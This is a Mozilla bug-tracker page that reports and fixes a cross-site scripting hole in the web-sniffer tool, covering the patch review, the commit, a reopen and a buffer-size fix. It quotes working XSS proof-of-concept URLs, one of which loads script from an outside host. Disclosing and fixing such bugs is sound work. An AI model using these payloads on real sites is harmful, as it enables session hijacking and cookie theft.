Closed Bug 57556 Opened 24 years ago Closed 20 years ago

web-sniffer displays "url" param without escaping

Categories

(Webtools Graveyard :: Web Sniffer, defect, P3)

Product:
Webtools Graveyard
Component:
Web Sniffer
Platform:
Other
Other
Type:
defect

Tracking

(Not tracked)

Status:
RESOLVED FIXED
Milestone:
Future

People

(Reporter: jruderman, Assigned: erik)

References

(
URL
)

Details

(Whiteboard: security)

Attachments

(1 file, 1 obsolete file)

patch v2: doesn't throw away escaped_str
4.28 KB, patch
dmosedale
: review+
Details | Diff | Splinter Review
The web-sniffer webtool displays the "url" param without escaping it, so an attacker could make "me" do things on http://webtools.mozilla.org/ that I wouldn't do myself or steal my cookie for mozilla.org or webtools.mozilla.org. I don't know what else is on webtools.mozilla.org, so I don't know if this is a major problem for the mozilla.org installation, but other people might set up the web-sniffer tool at a hostname that uses cookies at some or all pages, or depends on the http referer for making sure a change is coming really coming from the user.
It also doesn't quote or escape the current url when it encounters usemap=#anchor (I didn't test a href=#anchor). http://webtools.mozilla.org/web-sniffer/view.cgi?url=http%3A%2F% 2Fhome.crosswinds.net%2Fnotfound.php%3Fnf%3D%2F%7Ejedinicht%2FAnakin.zip%22%3E% 3Cscript%3Ealert%281%29%3C%2Fscript%3E <font color=#3333FF>0</font> <font color=#009900> </font> <font color=#FF6600>usemap</font> <font color=#009900>="</font> <a href=view.cgi?url=http://home.crosswinds.net/notfound.php? nf=/~jedinicht/Anakin.zip"><script>alert(1)</script>#lshop><font color=#3333FF>#lshop</font></a><font color=#009900>"&gt;</font><font color=#FF0000>LF</font>
Erik owns the web sniffer.
Assignee: tara → erik
Component: Bugzilla → Web Sniffer
erik is leaving. mark it as Future
Target Milestone: --- → Future
erik resign. reassign all his bug to ftang for now.
Assignee: erik → ftang
mark all future new as assigned after move from erik to ftang
Status: NEW → ASSIGNED
Reassign to Dawn to evaluate whether mozilla.org wants to keep hosting this tool in its broken state. I don't see that mozilla.org has set any cookies, but I don't know what other tools might run on webtools.mozilla.org and have cookies worth stealing. There's also the remote possibility of a targetted attack against staff@mozilla.org who might have access to content on *.mozilla.org that is not normally accessible, but which the attacker knew existed. With the document.domain bug fixed attacks would be restricted to webtools.mozilla.org so there's even less potential damage. security@mozilla.org received the following today: > Received: from thor2k [212.112.131.133] by jscript.dk with ESMTP > (SMTPD32-6.06) id A2BC9C5500B2; Wed, 04 Sep 2002 11:30:36 +0200 > Message-ID: <00ad01c253f5$f74851c0$858370d4@thor2k> > From: "Thor Larholm" <thor@pivx.com> > To: <secure@mozilla.org> > Subject: Fw: [css-d] css problem with netsacpe 7 > Date: Wed, 4 Sep 2002 11:32:19 +0200 > MIME-Version: 1.0 > Content-Type: text/plain; > charset="iso-8859-1" > Content-Transfer-Encoding: 7bit > X-Priority: 3 > X-MSMail-Priority: Normal > X-Mailer: Microsoft Outlook Express 6.00.2600.0000 > X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 > > Hi, > > Mozilla.org has a small XSS hole in its web-sniffer. > > Example: > http://webtools.mozilla.org/web-sniffer/view.cgi?url=<script%20src=http://jscript.dk/test.js></script>&verbose=on > > What is XSS: > http://www.cert.org/advisories/CA-2000-02.html > http://www.cgisecurity.com/articles/xss-faq.txt > > > Regards > Thor Larholm, Security Researcher > PivX Solutions, LLC > > Are You Secure? > http://www.PivX.com
Assignee: ftang → endico
Status: ASSIGNED → NEW
Comment on attachment 99104 [details] [diff] [review] patch v1: patch that fixes problem the new toHTML appears to throw away the escaped string.
Attachment #99104 - Flags: needs-work+
I've spent some time staring at this, and I'm having problems reproducing the bug, and it's not clear to me why. Can you ping me tommorrow and help figure this out?
Try this URL to reproduce the problem and its solution: http://webtools.mozilla.org/web-sniffer/view.cgi?url=%3Cscript%3Ealert('foo!');%3C/script%3E&verbose=on http://webtools.mozilla.org/web-sniffer/stage/view.cgi?url=%3Cscript%3Ealert('foo!');%3C/script%3E&verbose=on The first URL should display an alert dialog (demonstrating arbitrary JavaScript running from the mozilla.org domain), while the latter demonstrates the fix (escaping the JavaScript so it appears as text in the page instead of executing). If you don't get an alert dialog when you load the first URL, make sure you have pop-up blocking disabled, since that features blocks alerts as well in recent nightlies (bug 167559).
Comment on attachment 99160 [details] [diff] [review] patch v2: doesn't throw away escaped_str r=dmose
Attachment #99160 - Flags: review+
Checking in cgiview.c; /cvsroot/mozilla/webtools/web-sniffer/cgiview.c,v <-- cgiview.c new revision: 1.3; previous revision: 1.2 done Checking in html.c; /cvsroot/mozilla/webtools/web-sniffer/html.c,v <-- html.c new revision: 1.3; previous revision: 1.2 done Checking in html.h; /cvsroot/mozilla/webtools/web-sniffer/html.h,v <-- html.h new revision: 1.2; previous revision: 1.1 done Checking in net.c; /cvsroot/mozilla/webtools/web-sniffer/net.c,v <-- net.c new revision: 1.3; previous revision: 1.2 done Checking in view.c; /cvsroot/mozilla/webtools/web-sniffer/view.c,v <-- view.c new revision: 1.2; previous revision: 1.1 done gcc -Wall -pedantic -D_REENTRANT -O -c -o addurl.o addurl.c gcc -Wall -pedantic -D_REENTRANT -O -c -o file.o file.c gcc -Wall -pedantic -D_REENTRANT -O -c -o hash.o hash.c gcc -Wall -pedantic -D_REENTRANT -O -c -o html.o html.c gcc -Wall -pedantic -D_REENTRANT -O -c -o http.o http.c gcc -Wall -pedantic -D_REENTRANT -O -c -o io.o io.c gcc -Wall -pedantic -D_REENTRANT -O -c -o mime.o mime.c gcc -Wall -pedantic -D_REENTRANT -O -c -o net.o net.c gcc -Wall -pedantic -D_REENTRANT -O -c -o url.o url.c gcc -Wall -pedantic -D_REENTRANT -O -c -o utils.o utils.c gcc -Wall -pedantic -D_REENTRANT -O -c -o view.o view.c gcc -Wall -pedantic -D_REENTRANT -O cgiview.c addurl.o file.o hash.o html.o http.o io.o mime.o net.o url.o utils.o view.o -lsocket -lnsl -o view.cgi
Status: NEW → RESOLVED
Closed: 22 years ago
Resolution: --- → FIXED
Thor, thanks for re-reporting this bug, and Myk, thanks for fixing it.
myk: you introduced lines which didn't contain tabs into files which were purely tab based.
Status: RESOLVED → VERIFIED
Whiteboard: security
Thanks to all for working on this bug, but there was a problem with the fix. In non-verbose mode, the viewer shows horizontal lines and status messages that should only appear in verbose mode. Reopening.
Status: VERIFIED → REOPENED
Resolution: FIXED → ---
Assignee: endico → erik
Status: REOPENED → NEW
The valgrind tool found another problem: result = calloc(strlen((char *) escaped_str)+2, 1); Should be "+3" for the 2 double-quotes and the null terminator.
Fixed both problems. See Bonsai for file version details.
Status: NEW → RESOLVED
Closed: 22 years ago20 years ago
Resolution: --- → FIXED
QA Contact: mattyt-bugzilla → web.sniffer
Product: Webtools → Webtools Graveyard
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: